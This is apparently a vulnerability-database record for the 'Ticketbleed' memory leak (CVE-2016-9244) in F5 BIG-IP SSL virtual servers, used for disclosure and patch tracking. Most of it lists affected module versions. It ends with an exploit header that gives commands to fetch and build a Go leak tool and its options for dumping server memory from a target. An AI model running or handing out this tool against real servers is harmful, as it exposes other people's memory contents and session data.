ID

VAR-E-201702-0115


CVE

cve_id:CVE-2016-9244

Trust: 1.8

sources: BID: 96143 // PACKETSTORM: 141017 // EXPLOIT-DB: 41298

EDB ID

41298


TITLE

F5 BIG-IP SSL Virtual Server - 'Ticketbleed' Memory Disclosure - Hardware remote Exploit

Trust: 0.6

sources: EXPLOIT-DB: 41298

DESCRIPTION

F5 BIG-IP SSL Virtual Server - 'Ticketbleed' Memory Disclosure. CVE-2016-9244 . remote exploit for Hardware platform

Trust: 0.6

sources: EXPLOIT-DB: 41298

AFFECTED PRODUCTS

vendor:f5model:big-ip ssl virtual serverscope: - version: -

Trust: 1.6

vendor:f5model:big-ip ltmscope:eqversion:11.5

Trust: 0.6

vendor:f5model:big-ip ssl virtual serverscope:eqversion:11.6

Trust: 0.6

vendor:ticketbleedmodel:f5 tlsscope: - version: -

Trust: 0.5

vendor:f5model:big-ip pemscope:eqversion:12.1.2

Trust: 0.3

vendor:f5model:big-ip pemscope:eqversion:12.1.1

Trust: 0.3

vendor:f5model:big-ip pem hf2scope:eqversion:12.1

Trust: 0.3

vendor:f5model:big-ip pem hf1scope:eqversion:12.1

Trust: 0.3

vendor:f5model:big-ip pem hf4scope:eqversion:12.0

Trust: 0.3

vendor:f5model:big-ip pem hf3scope:eqversion:12.0

Trust: 0.3

vendor:f5model:big-ip pem hf2scope:eqversion:12.0

Trust: 0.3

vendor:f5model:big-ip pemscope:eqversion:12.0

Trust: 0.3

vendor:f5model:big-ip pem hf1scope:eqversion:11.6.1

Trust: 0.3

vendor:f5model:big-ip pemscope:eqversion:11.6.1

Trust: 0.3

vendor:f5model:big-ip pem hf8scope:eqversion:11.6

Trust: 0.3

vendor:f5model:big-ip pem hf6scope:eqversion:11.6

Trust: 0.3

vendor:f5model:big-ip pem hf2scope:eqversion:11.5.4

Trust: 0.3

vendor:f5model:big-ip pem hf1scope:eqversion:11.5.4

Trust: 0.3

vendor:f5model:big-ip pem hf2scope:eqversion:11.5.3

Trust: 0.3

vendor:f5model:big-ip pemscope:eqversion:11.5.3

Trust: 0.3

vendor:f5model:big-ip pem hf11scope:eqversion:11.5.1

Trust: 0.3

vendor:f5model:big-ip pem hf10scope:eqversion:11.5.1

Trust: 0.3

vendor:f5model:big-ip pemscope:eqversion:11.5.1

Trust: 0.3

vendor:f5model:big-ip pemscope:eqversion:11.5

Trust: 0.3

vendor:f5model:big-ip pem hf2scope:eqversion:11.4

Trust: 0.3

vendor:f5model:big-ip pemscope:eqversion:11.4

Trust: 0.3

vendor:f5model:big-ip pemscope:eqversion:12.1.0

Trust: 0.3

vendor:f5model:big-ip pem hf1scope:eqversion:12.0.0

Trust: 0.3

vendor:f5model:big-ip pem hf5scope:eqversion:11.6.0

Trust: 0.3

vendor:f5model:big-ip pem hf4scope:eqversion:11.6.0

Trust: 0.3

vendor:f5model:big-ip pemscope:eqversion:11.6.0

Trust: 0.3

vendor:f5model:big-ip pemscope:eqversion:11.5.4

Trust: 0.3

vendor:f5model:big-ip pem hf1scope:eqversion:11.5.3

Trust: 0.3

vendor:f5model:big-ip pem hf9scope:eqversion:11.4.1

Trust: 0.3

vendor:f5model:big-ip pem hf8scope:eqversion:11.4.1

Trust: 0.3

vendor:f5model:big-ip pem hf10scope:eqversion:11.4.1

Trust: 0.3

vendor:f5model:big-ip pemscope:eqversion:11.4.1

Trust: 0.3

vendor:f5model:big-ip ltmscope:eqversion:12.1.2

Trust: 0.3

vendor:f5model:big-ip ltmscope:eqversion:12.1.1

Trust: 0.3

vendor:f5model:big-ip ltm hf2scope:eqversion:12.1

Trust: 0.3

vendor:f5model:big-ip ltm hf1scope:eqversion:12.1

Trust: 0.3

vendor:f5model:big-ip ltm hf4scope:eqversion:12.0

Trust: 0.3

vendor:f5model:big-ip ltmscope:eqversion:12.0

Trust: 0.3

vendor:f5model:big-ip ltm hf1scope:eqversion:11.6.1

Trust: 0.3

vendor:f5model:big-ip ltmscope:eqversion:11.6.1

Trust: 0.3

vendor:f5model:big-ip ltm hf8scope:eqversion:11.6

Trust: 0.3

vendor:f5model:big-ip ltm hf7scope:eqversion:11.6

Trust: 0.3

vendor:f5model:big-ip ltm hf6scope:eqversion:11.6

Trust: 0.3

vendor:f5model:big-ip ltm hf2scope:eqversion:11.5.4

Trust: 0.3

vendor:f5model:big-ip ltm hf1scope:eqversion:11.5.4

Trust: 0.3

vendor:f5model:big-ip ltm hf2scope:eqversion:11.5.3

Trust: 0.3

vendor:f5model:big-ip ltmscope:eqversion:11.5.3

Trust: 0.3

vendor:f5model:big-ip ltmscope:eqversion:11.5.2

Trust: 0.3

vendor:f5model:big-ip ltmscope:eqversion:11.5.1

Trust: 0.3

vendor:f5model:big-ip ltm hf9scope:eqversion:11.4.1

Trust: 0.3

vendor:f5model:big-ip ltm hf6scope:eqversion:11.4.1

Trust: 0.3

vendor:f5model:big-ip ltm hf5scope:eqversion:11.4.1

Trust: 0.3

vendor:f5model:big-ip ltm hf4scope:eqversion:11.4.1

Trust: 0.3

vendor:f5model:big-ip ltm hf3scope:eqversion:11.4.1

Trust: 0.3

vendor:f5model:big-ip ltm hf2scope:eqversion:11.4.1

Trust: 0.3

vendor:f5model:big-ip ltm hf1scope:eqversion:11.4.1

Trust: 0.3

vendor:f5model:big-ip ltm hf9scope:eqversion:11.4

Trust: 0.3

vendor:f5model:big-ip ltm hf8scope:eqversion:11.4

Trust: 0.3

vendor:f5model:big-ip ltm hf7scope:eqversion:11.4

Trust: 0.3

vendor:f5model:big-ip ltm hf2scope:eqversion:11.4

Trust: 0.3

vendor:f5model:big-ip ltm hf10scope:eqversion:11.4

Trust: 0.3

vendor:f5model:big-ip ltmscope:eqversion:11.4

Trust: 0.3

vendor:f5model:big-ip ltmscope:eqversion:12.1.0

Trust: 0.3

vendor:f5model:big-ip ltm hf3scope:eqversion:12.0.0

Trust: 0.3

vendor:f5model:big-ip ltm hf2scope:eqversion:12.0.0

Trust: 0.3

vendor:f5model:big-ip ltm hf1scope:eqversion:12.0.0

Trust: 0.3

vendor:f5model:big-ip ltm hf5scope:eqversion:11.6.0

Trust: 0.3

vendor:f5model:big-ip ltm hf4scope:eqversion:11.6.0

Trust: 0.3

vendor:f5model:big-ip ltmscope:eqversion:11.6.0

Trust: 0.3

vendor:f5model:big-ip ltmscope:eqversion:11.5.4

Trust: 0.3

vendor:f5model:big-ip ltm hf1scope:eqversion:11.5.3

Trust: 0.3

vendor:f5model:big-ip ltm hf8scope:eqversion:11.4.1

Trust: 0.3

vendor:f5model:big-ip ltm hf11scope:eqversion:11.4.1

Trust: 0.3

vendor:f5model:big-ip ltm hf10scope:eqversion:11.4.1

Trust: 0.3

vendor:f5model:big-ip ltmscope:eqversion:11.4.1

Trust: 0.3

vendor:f5model:big-ip link controllerscope:eqversion:12.1.2

Trust: 0.3

vendor:f5model:big-ip link controllerscope:eqversion:12.1.1

Trust: 0.3

vendor:f5model:big-ip link controller hf2scope:eqversion:12.1

Trust: 0.3

vendor:f5model:big-ip link controller hf1scope:eqversion:12.1

Trust: 0.3

vendor:f5model:big-ip link controller hf4scope:eqversion:12.0

Trust: 0.3

vendor:f5model:big-ip link controller hf3scope:eqversion:12.0

Trust: 0.3

vendor:f5model:big-ip link controller hf2scope:eqversion:12.0

Trust: 0.3

vendor:f5model:big-ip link controller buildscope:eqversion:12.01.14.628

Trust: 0.3

vendor:f5model:big-ip link controllerscope:eqversion:12.0

Trust: 0.3

vendor:f5model:big-ip link controller hf1scope:eqversion:11.6.1

Trust: 0.3

vendor:f5model:big-ip link controller hf8scope:eqversion:11.6

Trust: 0.3

vendor:f5model:big-ip link controller hf6scope:eqversion:11.6

Trust: 0.3

vendor:f5model:big-ip link controller hf4scope:eqversion:11.6

Trust: 0.3

vendor:f5model:big-ip link controller buildscope:eqversion:11.66.204.442

Trust: 0.3

vendor:f5model:big-ip link controllerscope:eqversion:11.6

Trust: 0.3

vendor:f5model:big-ip link controller hf2scope:eqversion:11.5.4

Trust: 0.3

vendor:f5model:big-ip link controller hf1scope:eqversion:11.5.4

Trust: 0.3

vendor:f5model:big-ip link controller buildscope:eqversion:11.5.40.1.256

Trust: 0.3

vendor:f5model:big-ip link controller hf2scope:eqversion:11.5.3

Trust: 0.3

vendor:f5model:big-ip link controllerscope:eqversion:11.5.3

Trust: 0.3

vendor:f5model:big-ip link controllerscope:eqversion:11.5.2

Trust: 0.3

vendor:f5model:big-ip link controller hf8scope:eqversion:11.5.1

Trust: 0.3

vendor:f5model:big-ip link controller hf11scope:eqversion:11.5.1

Trust: 0.3

vendor:f5model:big-ip link controller hf10scope:eqversion:11.5.1

Trust: 0.3

vendor:f5model:big-ip link controllerscope:eqversion:11.5.1

Trust: 0.3

vendor:f5model:big-ip link controller hf7scope:eqversion:11.5

Trust: 0.3

vendor:f5model:big-ip link controllerscope:eqversion:11.5

Trust: 0.3

vendor:f5model:big-ip link controller hf6scope:eqversion:11.4.1

Trust: 0.3

vendor:f5model:big-ip link controller hf5scope:eqversion:11.4.1

Trust: 0.3

vendor:f5model:big-ip link controller hf4scope:eqversion:11.4.1

Trust: 0.3

vendor:f5model:big-ip link controller hf3scope:eqversion:11.4.1

Trust: 0.3

vendor:f5model:big-ip link controller hf2scope:eqversion:11.4.1

Trust: 0.3

vendor:f5model:big-ip link controller hf1scope:eqversion:11.4.1

Trust: 0.3

vendor:f5model:big-ip link controller hf9scope:eqversion:11.4

Trust: 0.3

vendor:f5model:big-ip link controller hf8scope:eqversion:11.4

Trust: 0.3

vendor:f5model:big-ip link controller hf2scope:eqversion:11.4

Trust: 0.3

vendor:f5model:big-ip link controller hf10scope:eqversion:11.4

Trust: 0.3

vendor:f5model:big-ip link controllerscope:eqversion:11.4

Trust: 0.3

vendor:f5model:big-ip link controllerscope:eqversion:12.1.0

Trust: 0.3

vendor:f5model:big-ip link controller hf1scope:eqversion:12.0.0

Trust: 0.3

vendor:f5model:big-ip link controllerscope:eqversion:11.6.1

Trust: 0.3

vendor:f5model:big-ip link controller hf5scope:eqversion:11.6.0

Trust: 0.3

vendor:f5model:big-ip link controllerscope:eqversion:11.5.4

Trust: 0.3

vendor:f5model:big-ip link controller hf1scope:eqversion:11.5.3

Trust: 0.3

vendor:f5model:big-ip link controller hf8scope:eqversion:11.4.1

Trust: 0.3

vendor:f5model:big-ip link controller hf10scope:eqversion:11.4.1

Trust: 0.3

vendor:f5model:big-ip link controllerscope:eqversion:11.4.1

Trust: 0.3

vendor:f5model:big-ip asmscope:eqversion:12.1.2

Trust: 0.3

vendor:f5model:big-ip asmscope:eqversion:12.1.1

Trust: 0.3

vendor:f5model:big-ip asm hf2scope:eqversion:12.1

Trust: 0.3

vendor:f5model:big-ip asm hf1scope:eqversion:12.1

Trust: 0.3

vendor:f5model:big-ip asm hf4scope:eqversion:12.0

Trust: 0.3

vendor:f5model:big-ip asm buildscope:eqversion:12.01.14.628

Trust: 0.3

vendor:f5model:big-ip asmscope:eqversion:12.0

Trust: 0.3

vendor:f5model:big-ip asm hf1scope:eqversion:11.6.1

Trust: 0.3

vendor:f5model:big-ip asmscope:eqversion:11.6.1

Trust: 0.3

vendor:f5model:big-ip asm hf8scope:eqversion:11.6

Trust: 0.3

vendor:f5model:big-ip asm hf7scope:eqversion:11.6

Trust: 0.3

vendor:f5model:big-ip asm hf6scope:eqversion:11.6

Trust: 0.3

vendor:f5model:big-ip asm buildscope:eqversion:11.66.204.442

Trust: 0.3

vendor:f5model:big-ip asm hf1scope:eqversion:11.5.4

Trust: 0.3

vendor:f5model:big-ip asm buildscope:eqversion:11.5.40.1.256

Trust: 0.3

vendor:f5model:big-ip asm hf2scope:eqversion:11.5.3

Trust: 0.3

vendor:f5model:big-ip asmscope:eqversion:11.5.3

Trust: 0.3

vendor:f5model:big-ip asmscope:eqversion:11.5.2

Trust: 0.3

vendor:f5model:big-ip asm hf11scope:eqversion:11.5.1

Trust: 0.3

vendor:f5model:big-ip asm hf10scope:eqversion:11.5.1

Trust: 0.3

vendor:f5model:big-ip asm buildscope:eqversion:11.5.110.104.180

Trust: 0.3

vendor:f5model:big-ip asmscope:eqversion:11.5.1

Trust: 0.3

vendor:f5model:big-ip asmscope:eqversion:11.5

Trust: 0.3

vendor:f5model:big-ip asm hf6scope:eqversion:11.4.1

Trust: 0.3

vendor:f5model:big-ip asm hf5scope:eqversion:11.4.1

Trust: 0.3

vendor:f5model:big-ip asm hf4scope:eqversion:11.4.1

Trust: 0.3

vendor:f5model:big-ip asm hf3scope:eqversion:11.4.1

Trust: 0.3

vendor:f5model:big-ip asm hf2scope:eqversion:11.4.1

Trust: 0.3

vendor:f5model:big-ip asm hf1scope:eqversion:11.4.1

Trust: 0.3

vendor:f5model:big-ip asm build 685-hf10scope:eqversion:11.4.1

Trust: 0.3

vendor:f5model:big-ip asm hf9scope:eqversion:11.4

Trust: 0.3

vendor:f5model:big-ip asm hf8scope:eqversion:11.4

Trust: 0.3

vendor:f5model:big-ip asm hf2scope:eqversion:11.4

Trust: 0.3

vendor:f5model:big-ip asm hf10scope:eqversion:11.4

Trust: 0.3

vendor:f5model:big-ip asmscope:eqversion:11.4

Trust: 0.3

vendor:f5model:big-ip asm hf1scope:eqversion:12.1.1

Trust: 0.3

vendor:f5model:big-ip asmscope:eqversion:12.1.0

Trust: 0.3

vendor:f5model:big-ip asm hf3scope:eqversion:12.0.0

Trust: 0.3

vendor:f5model:big-ip asm hf2scope:eqversion:12.0.0

Trust: 0.3

vendor:f5model:big-ip asm hf1scope:eqversion:12.0.0

Trust: 0.3

vendor:f5model:big-ip asm hf5scope:eqversion:11.6.0

Trust: 0.3

vendor:f5model:big-ip asm hf4scope:eqversion:11.6.0

Trust: 0.3

vendor:f5model:big-ip asmscope:eqversion:11.6.0

Trust: 0.3

vendor:f5model:big-ip asmscope:eqversion:11.5.4

Trust: 0.3

vendor:f5model:big-ip asm hf1scope:eqversion:11.5.3

Trust: 0.3

vendor:f5model:big-ip asm hf9scope:eqversion:11.4.1

Trust: 0.3

vendor:f5model:big-ip asm hf8scope:eqversion:11.4.1

Trust: 0.3

vendor:f5model:big-ip asm hf10scope:eqversion:11.4.1

Trust: 0.3

vendor:f5model:big-ip asmscope:eqversion:11.4.1

Trust: 0.3

vendor:f5model:big-ip apmscope:eqversion:12.1.2

Trust: 0.3

vendor:f5model:big-ip apmscope:eqversion:12.1.1

Trust: 0.3

vendor:f5model:big-ip apm hf2scope:eqversion:12.1

Trust: 0.3

vendor:f5model:big-ip apm hf1scope:eqversion:12.1

Trust: 0.3

vendor:f5model:big-ip apm hf4scope:eqversion:12.0

Trust: 0.3

vendor:f5model:big-ip apm hf3scope:eqversion:12.0

Trust: 0.3

vendor:f5model:big-ip apm hf2scope:eqversion:12.0

Trust: 0.3

vendor:f5model:big-ip apm buildscope:eqversion:12.01.14.628

Trust: 0.3

vendor:f5model:big-ip apmscope:eqversion:12.0

Trust: 0.3

vendor:f5model:big-ip apm hf1scope:eqversion:11.6.1

Trust: 0.3

vendor:f5model:big-ip apmscope:eqversion:11.6.1

Trust: 0.3

vendor:f5model:big-ip apm hf8scope:eqversion:11.6

Trust: 0.3

vendor:f5model:big-ip apm hf7scope:eqversion:11.6

Trust: 0.3

vendor:f5model:big-ip apm hf6scope:eqversion:11.6

Trust: 0.3

vendor:f5model:big-ip apm hf5scope:eqversion:11.6

Trust: 0.3

vendor:f5model:big-ip apm hf4scope:eqversion:11.6

Trust: 0.3

vendor:f5model:big-ip apm hf3scope:eqversion:11.6

Trust: 0.3

vendor:f5model:big-ip apm buildscope:eqversion:11.66.204.442

Trust: 0.3

vendor:f5model:big-ip apm hf2scope:eqversion:11.5.4

Trust: 0.3

vendor:f5model:big-ip apm hf1scope:eqversion:11.5.4

Trust: 0.3

vendor:f5model:big-ip apm buildscope:eqversion:11.5.40.1.256

Trust: 0.3

vendor:f5model:big-ip apm hf2scope:eqversion:11.5.3

Trust: 0.3

vendor:f5model:big-ip apmscope:eqversion:11.5.3

Trust: 0.3

vendor:f5model:big-ip apm hf1scope:eqversion:11.5.2

Trust: 0.3

vendor:f5model:big-ip apmscope:eqversion:11.5.2

Trust: 0.3

vendor:f5model:big-ip apm hf11scope:eqversion:11.5.1

Trust: 0.3

vendor:f5model:big-ip apm hf10scope:eqversion:11.5.1

Trust: 0.3

vendor:f5model:big-ip apm buildscope:eqversion:11.5.110.104.180

Trust: 0.3

vendor:f5model:big-ip apmscope:eqversion:11.5.1

Trust: 0.3

vendor:f5model:big-ip apm hf9scope:eqversion:11.4.1

Trust: 0.3

vendor:f5model:big-ip apm hf8scope:eqversion:11.4.1

Trust: 0.3

vendor:f5model:big-ip apm hf6scope:eqversion:11.4.1

Trust: 0.3

vendor:f5model:big-ip apm hf5scope:eqversion:11.4.1

Trust: 0.3

vendor:f5model:big-ip apm hf4scope:eqversion:11.4.1

Trust: 0.3

vendor:f5model:big-ip apm hf3scope:eqversion:11.4.1

Trust: 0.3

vendor:f5model:big-ip apm hf2scope:eqversion:11.4.1

Trust: 0.3

vendor:f5model:big-ip apm hf1scope:eqversion:11.4.1

Trust: 0.3

vendor:f5model:big-ip apm build 685-hf10scope:eqversion:11.4.1

Trust: 0.3

vendor:f5model:big-ip apm hf9scope:eqversion:11.4

Trust: 0.3

vendor:f5model:big-ip apm hf8scope:eqversion:11.4

Trust: 0.3

vendor:f5model:big-ip apm hf2scope:eqversion:11.4

Trust: 0.3

vendor:f5model:big-ip apm hf10scope:eqversion:11.4

Trust: 0.3

vendor:f5model:big-ip apmscope:eqversion:12.1.0

Trust: 0.3

vendor:f5model:big-ip apm hf1scope:eqversion:12.0.0

Trust: 0.3

vendor:f5model:big-ip apmscope:eqversion:11.6.0

Trust: 0.3

vendor:f5model:big-ip apmscope:eqversion:11.5.4

Trust: 0.3

vendor:f5model:big-ip apm hf1scope:eqversion:11.5.3

Trust: 0.3

vendor:f5model:big-ip apmscope:eqversion:11.5.0

Trust: 0.3

vendor:f5model:big-ip apm hf10scope:eqversion:11.4.1

Trust: 0.3

vendor:f5model:big-ip apmscope:eqversion:11.4.1

Trust: 0.3

vendor:f5model:big-ip apmscope:eqversion:11.4.0

Trust: 0.3

vendor:f5model:big-ip analyticsscope:eqversion:12.1.2

Trust: 0.3

vendor:f5model:big-ip analyticsscope:eqversion:12.1.1

Trust: 0.3

vendor:f5model:big-ip analytics buildscope:eqversion:12.01.14.628

Trust: 0.3

vendor:f5model:big-ip analyticsscope:eqversion:12.0

Trust: 0.3

vendor:f5model:big-ip analytics hf1scope:eqversion:11.6.1

Trust: 0.3

vendor:f5model:big-ip analyticsscope:eqversion:11.6.1

Trust: 0.3

vendor:f5model:big-ip analytics hf7scope:eqversion:11.6

Trust: 0.3

vendor:f5model:big-ip analytics hf6scope:eqversion:11.6

Trust: 0.3

vendor:f5model:big-ip analytics hf4scope:eqversion:11.6

Trust: 0.3

vendor:f5model:big-ip analytics buildscope:eqversion:11.66.204.442

Trust: 0.3

vendor:f5model:big-ip analytics hf2scope:eqversion:11.5.4

Trust: 0.3

vendor:f5model:big-ip analytics hf1scope:eqversion:11.5.4

Trust: 0.3

vendor:f5model:big-ip analytics buildscope:eqversion:11.5.40.1.256

Trust: 0.3

vendor:f5model:big-ip analytics hf2scope:eqversion:11.5.3

Trust: 0.3

vendor:f5model:big-ip analyticsscope:eqversion:11.5.3

Trust: 0.3

vendor:f5model:big-ip analyticsscope:eqversion:11.5.2

Trust: 0.3

vendor:f5model:big-ip analytics hf8scope:eqversion:11.5.1

Trust: 0.3

vendor:f5model:big-ip analytics buildscope:eqversion:11.5.110.104.180

Trust: 0.3

vendor:f5model:big-ip analyticsscope:eqversion:11.5.1

Trust: 0.3

vendor:f5model:big-ip analytics hf7scope:eqversion:11.5

Trust: 0.3

vendor:f5model:big-ip analyticsscope:eqversion:11.5

Trust: 0.3

vendor:f5model:big-ip analytics hf6scope:eqversion:11.4.1

Trust: 0.3

vendor:f5model:big-ip analytics hf5scope:eqversion:11.4.1

Trust: 0.3

vendor:f5model:big-ip analytics hf4scope:eqversion:11.4.1

Trust: 0.3

vendor:f5model:big-ip analytics hf3scope:eqversion:11.4.1

Trust: 0.3

vendor:f5model:big-ip analytics hf2scope:eqversion:11.4.1

Trust: 0.3

vendor:f5model:big-ip analytics hf1scope:eqversion:11.4.1

Trust: 0.3

vendor:f5model:big-ip analytics build 685-hf10scope:eqversion:11.4.1

Trust: 0.3

vendor:f5model:big-ip analytics hf9scope:eqversion:11.4

Trust: 0.3

vendor:f5model:big-ip analytics hf8scope:eqversion:11.4

Trust: 0.3

vendor:f5model:big-ip analytics hf2scope:eqversion:11.4

Trust: 0.3

vendor:f5model:big-ip analytics hf10scope:eqversion:11.4

Trust: 0.3

vendor:f5model:big-ip analyticsscope:eqversion:11.4

Trust: 0.3

vendor:f5model:big-ip analyticsscope:eqversion:12.1.0

Trust: 0.3

vendor:f5model:big-ip analytics hf3scope:eqversion:12.0.0

Trust: 0.3

vendor:f5model:big-ip analytics hf2scope:eqversion:12.0.0

Trust: 0.3

vendor:f5model:big-ip analytics hf1scope:eqversion:12.0.0

Trust: 0.3

vendor:f5model:big-ip analytics hf5scope:eqversion:11.6.0

Trust: 0.3

vendor:f5model:big-ip analyticsscope:eqversion:11.6.0

Trust: 0.3

vendor:f5model:big-ip analyticsscope:eqversion:11.5.4

Trust: 0.3

vendor:f5model:big-ip analytics hf1scope:eqversion:11.5.3

Trust: 0.3

vendor:f5model:big-ip analytics hf9scope:eqversion:11.4.1

Trust: 0.3

vendor:f5model:big-ip analytics hf8scope:eqversion:11.4.1

Trust: 0.3

vendor:f5model:big-ip analytics hf10scope:eqversion:11.4.1

Trust: 0.3

vendor:f5model:big-ip analyticsscope:eqversion:11.4.1

Trust: 0.3

vendor:f5model:big-ip afmscope:eqversion:12.1.2

Trust: 0.3

vendor:f5model:big-ip afmscope:eqversion:12.1.1

Trust: 0.3

vendor:f5model:big-ip afm hf2scope:eqversion:12.1

Trust: 0.3

vendor:f5model:big-ip afm hf1scope:eqversion:12.1

Trust: 0.3

vendor:f5model:big-ip afm hf4scope:eqversion:12.0

Trust: 0.3

vendor:f5model:big-ip afm buildscope:eqversion:12.01.14.628

Trust: 0.3

vendor:f5model:big-ip afmscope:eqversion:12.0

Trust: 0.3

vendor:f5model:big-ip afm hf1scope:eqversion:11.6.1

Trust: 0.3

vendor:f5model:big-ip afmscope:eqversion:11.6.1

Trust: 0.3

vendor:f5model:big-ip afm hf8scope:eqversion:11.6

Trust: 0.3

vendor:f5model:big-ip afm hf7scope:eqversion:11.6

Trust: 0.3

vendor:f5model:big-ip afm hf6scope:eqversion:11.6

Trust: 0.3

vendor:f5model:big-ip afm buildscope:eqversion:11.66.204.442

Trust: 0.3

vendor:f5model:big-ip afm hf2scope:eqversion:11.5.4

Trust: 0.3

vendor:f5model:big-ip afm hf1scope:eqversion:11.5.4

Trust: 0.3

vendor:f5model:big-ip afm buildscope:eqversion:11.5.40.1.256

Trust: 0.3

vendor:f5model:big-ip afm hf2scope:eqversion:11.5.3

Trust: 0.3

vendor:f5model:big-ip afmscope:eqversion:11.5.3

Trust: 0.3

vendor:f5model:big-ip afmscope:eqversion:11.5.2

Trust: 0.3

vendor:f5model:big-ip afm hf11scope:eqversion:11.5.1

Trust: 0.3

vendor:f5model:big-ip afm hf10scope:eqversion:11.5.1

Trust: 0.3

vendor:f5model:big-ip afm buildscope:eqversion:11.5.110.104.180

Trust: 0.3

vendor:f5model:big-ip afmscope:eqversion:11.5.1

Trust: 0.3

vendor:f5model:big-ip afmscope:eqversion:11.5

Trust: 0.3

vendor:f5model:big-ip afm hf2scope:eqversion:11.4.1

Trust: 0.3

vendor:f5model:big-ip afm hf1scope:eqversion:11.4.1

Trust: 0.3

vendor:f5model:big-ip afm build 685-hf10scope:eqversion:11.4.1

Trust: 0.3

vendor:f5model:big-ip afm hf9scope:eqversion:11.4

Trust: 0.3

vendor:f5model:big-ip afm hf8scope:eqversion:11.4

Trust: 0.3

vendor:f5model:big-ip afm hf2scope:eqversion:11.4

Trust: 0.3

vendor:f5model:big-ip afm hf10scope:eqversion:11.4

Trust: 0.3

vendor:f5model:big-ip afmscope:eqversion:11.4

Trust: 0.3

vendor:f5model:big-ip afmscope:eqversion:12.1.0

Trust: 0.3

vendor:f5model:big-ip afm hf3scope:eqversion:12.0.0

Trust: 0.3

vendor:f5model:big-ip afm hf2scope:eqversion:12.0.0

Trust: 0.3

vendor:f5model:big-ip afm hf1scope:eqversion:12.0.0

Trust: 0.3

vendor:f5model:big-ip afm hf5scope:eqversion:11.6.0

Trust: 0.3

vendor:f5model:big-ip afm hf4scope:eqversion:11.6.0

Trust: 0.3

vendor:f5model:big-ip afmscope:eqversion:11.6.0

Trust: 0.3

vendor:f5model:big-ip afmscope:eqversion:11.5.4

Trust: 0.3

vendor:f5model:big-ip afm hf1scope:eqversion:11.5.3

Trust: 0.3

vendor:f5model:big-ip afm hf10scope:eqversion:11.4.1

Trust: 0.3

vendor:f5model:big-ip afmscope:eqversion:11.4.1

Trust: 0.3

vendor:f5model:big-ip aamscope:eqversion:12.1.2

Trust: 0.3

vendor:f5model:big-ip aamscope:eqversion:12.1.1

Trust: 0.3

vendor:f5model:big-ip aam hf2scope:eqversion:12.1

Trust: 0.3

vendor:f5model:big-ip aam hf1scope:eqversion:12.1

Trust: 0.3

vendor:f5model:big-ip aam hf4scope:eqversion:12.0

Trust: 0.3

vendor:f5model:big-ip aamscope:eqversion:12.0

Trust: 0.3

vendor:f5model:big-ip aam hf2scope:eqversion:11.5.4

Trust: 0.3

vendor:f5model:big-ip aam hf1scope:eqversion:11.5.4

Trust: 0.3

vendor:f5model:big-ip aam buildscope:eqversion:11.5.40.1.256

Trust: 0.3

vendor:f5model:big-ip aam hf2scope:eqversion:11.5.3

Trust: 0.3

vendor:f5model:big-ip aamscope:eqversion:11.5.3

Trust: 0.3

vendor:f5model:big-ip aamscope:eqversion:11.5.2

Trust: 0.3

vendor:f5model:big-ip aam hf11scope:eqversion:11.5.1

Trust: 0.3

vendor:f5model:big-ip aam hf10scope:eqversion:11.5.1

Trust: 0.3

vendor:f5model:big-ip aam buildscope:eqversion:11.5.110.104.180

Trust: 0.3

vendor:f5model:big-ip aamscope:eqversion:11.5.1

Trust: 0.3

vendor:f5model:big-ip aamscope:eqversion:11.5

Trust: 0.3

vendor:f5model:big-ip aam hf6scope:eqversion:11.4.1

Trust: 0.3

vendor:f5model:big-ip aam hf5scope:eqversion:11.4.1

Trust: 0.3

vendor:f5model:big-ip aam hf4scope:eqversion:11.4.1

Trust: 0.3

vendor:f5model:big-ip aam hf3scope:eqversion:11.4.1

Trust: 0.3

vendor:f5model:big-ip aam hf2scope:eqversion:11.4.1

Trust: 0.3

vendor:f5model:big-ip aam hf1scope:eqversion:11.4.1

Trust: 0.3

vendor:f5model:big-ip aam build 685-hf10scope:eqversion:11.4.1

Trust: 0.3

vendor:f5model:big-ip aam hf9scope:eqversion:11.4

Trust: 0.3

vendor:f5model:big-ip aam hf8scope:eqversion:11.4

Trust: 0.3

vendor:f5model:big-ip aam hf2scope:eqversion:11.4

Trust: 0.3

vendor:f5model:big-ip aam hf10scope:eqversion:11.4

Trust: 0.3

vendor:f5model:big-ip aamscope:eqversion:12.1.0

Trust: 0.3

vendor:f5model:big-ip aam hf3scope:eqversion:12.0.0

Trust: 0.3

vendor:f5model:big-ip aam hf2scope:eqversion:12.0.0

Trust: 0.3

vendor:f5model:big-ip aam hf1scope:eqversion:12.0.0

Trust: 0.3

vendor:f5model:big-ip aamscope:eqversion:11.5.4

Trust: 0.3

vendor:f5model:big-ip aam hf1scope:eqversion:11.5.3

Trust: 0.3

vendor:f5model:big-ip aam hf9scope:eqversion:11.4.1

Trust: 0.3

vendor:f5model:big-ip aam hf8scope:eqversion:11.4.1

Trust: 0.3

vendor:f5model:big-ip aam hf10scope:eqversion:11.4.1

Trust: 0.3

vendor:f5model:big-ip aamscope:eqversion:11.4.1

Trust: 0.3

vendor:f5model:big-ip aamscope:eqversion:11.4.0

Trust: 0.3

vendor:f5model:big-ip pem hf2scope:neversion:11.6.1

Trust: 0.3

vendor:f5model:big-ip ltm hf2scope:neversion:11.6.1

Trust: 0.3

vendor:f5model:big-ip ltmscope:neversion:11.2.1

Trust: 0.3

vendor:f5model:big-ip link controller hf2scope:neversion:11.6.1

Trust: 0.3

vendor:f5model:big-ip link controllerscope:neversion:11.2.1

Trust: 0.3

vendor:f5model:big-ip asm hf2scope:neversion:11.6.1

Trust: 0.3

vendor:f5model:big-ip asmscope:neversion:11.2.1

Trust: 0.3

vendor:f5model:big-ip apm hf2scope:neversion:11.6.1

Trust: 0.3

vendor:f5model:big-ip apmscope:neversion:11.2.1

Trust: 0.3

vendor:f5model:big-ip analytics hf2scope:neversion:11.6.1

Trust: 0.3

vendor:f5model:big-ip analyticsscope:neversion:11.2.1

Trust: 0.3

vendor:f5model:big-ip afm hf2scope:neversion:11.6.1

Trust: 0.3

vendor:f5model:big-ip aam hf2scope:neversion:11.6.1

Trust: 0.3

sources: BID: 96143 // PACKETSTORM: 141017 // EXPLOIT-DB: 41298 // EDBNET: 90818 // EDBNET: 97483

EXPLOIT

/*
# Exploit Title: [Ticketbleed (CVE-2016-9244) F5 BIG-IP SSL virtual server Memory Leakage]
# Date: [10.02.2017]
# Exploit Author: [Ege Balcı]
# Vendor Homepage: [https://f5.com/]
# Version: [12.0.0 - 12.1.2 && 11.4.0 - 11.6.1]
# Tested on: [Multiple]
# CVE : [CVE-2016-9244]

BUILD:
go get github.com/EgeBalci/Ticketbleed
go build Ticketbleed.go

USAGE:
./ticketbleed <options> <ip:port>
OPTIONS:
-o, --out Output filename for raw memory
-s, --size Size in bytes to read
